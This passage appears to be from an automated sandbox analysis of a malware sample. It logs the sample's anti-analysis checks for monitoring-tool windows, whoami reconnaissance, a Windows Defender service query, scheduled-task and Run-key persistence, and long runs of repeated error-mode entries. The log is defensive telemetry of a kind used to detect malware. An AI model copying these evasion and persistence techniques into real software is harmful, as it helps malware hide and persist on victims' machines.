Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses whoami command line tool to query computer and username

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\whoami.exe "C:\Windows\system32\whoami.exe" /groups

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 75f24a4b40.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 75f24a4b40.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9e4b3ff3c2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9e4b3ff3c2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae44c30d83.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ae44c30d83.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2fdabbc809.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2fdabbc809.exe	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\system32\sc.exe" qc windefend

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\27704828C8BCBA00F78A 42B16D214B9336027C3E854C119739FAC4CCEAC6E91045F69D1DB18144B538BD

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
